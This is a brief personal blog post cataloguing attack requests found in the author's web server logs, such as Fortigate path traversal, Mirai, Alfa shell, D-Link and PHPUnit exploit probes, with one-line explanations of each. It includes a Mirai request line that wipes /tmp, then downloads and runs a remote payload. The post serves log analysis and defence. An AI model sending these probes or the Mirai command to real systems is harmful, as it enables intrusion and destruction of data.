TheMaxus

Common threat actor activity in logs

While looking at my web server logs I found some interesting requests and decided to look into them. Below are the request examples and short explainations for them.

/actuator/gateway/routes

spring.io Acutator endpoint scanning

/remote/fgt\_lang?lang=/../../../..//////////dev/cmdb/sslvpn\_websession

Fortigate vulneravility (CVE-2022-42475)

/shell?cd+/tmp;rm+-rf+*;wget+x.x.x.x/jaws;sh+/tmp/jaws

Mirai botnet scanning

/?XDEBUG_SESSION_START=phpstorm

PhpStorm debugging session scanning

/ALFA_DATA/alfacgiapi/perl.alfa

Alfa Shell PHP backdoor scanning

/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=x.x.x.x&dnsDynamic=0&dnsRefresh=1

D-Link router DNS-hijacking vulnerability

x.x.x.x:4444

4444 is the default Metaspoit framework shell port

/boaform/admin/formLogin?username=admin&psd=admin

Bots scanning for Guangzhou 1GE ONU V2801RW router RCE vulnerability

/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/owa/auth/logon.aspx

Microsoft Exchange server endpoint scanning

POST /HNAP1/

Another D-Link vuln (CVE-2022-44808)

POST /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php or similar requests

PHPUnit vulnerability (CVE-2017-9841)